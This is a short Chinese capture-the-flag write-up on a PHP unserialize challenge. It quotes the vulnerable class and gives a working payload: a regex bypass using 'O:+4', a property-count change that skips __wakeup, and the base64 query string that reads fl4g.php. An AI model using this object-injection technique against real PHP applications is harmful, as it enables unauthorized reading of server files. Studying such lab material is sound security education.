还是反序列化问题,先看题目
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>
看__wakeup
函数可以知道,是关于wakeup绕过问题。可以构造
O:4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
。
但是有一个if判断,正则匹配,o:数字:
,这样的会被匹配上。所以要把正则匹配给绕过,这里用的方法是在4前面加一个+
。
但是这里有个问题,我们虽然能够从php
中echo
出序列化之后的字符串,但是由于对象的属性是private
,所以实际上Demofile
是%00Demo%00file
但是%00又显示不出来,所以我们直接在php代码里面对需要替换的数字进行替换。
$obj = new Demo('fl4g.php');
$str = serialize($obj);//序列化
$str = str_replace('O:4', 'O:+4',$str);//替换4
$str = str_replace(':1:', ':2:',$str);//替换1
$result = base64_encode($str);//需要base64加密,因为源代码会对get过来的参数先进行base64解密。
最后构造?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
得到flag
<?php
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";
?>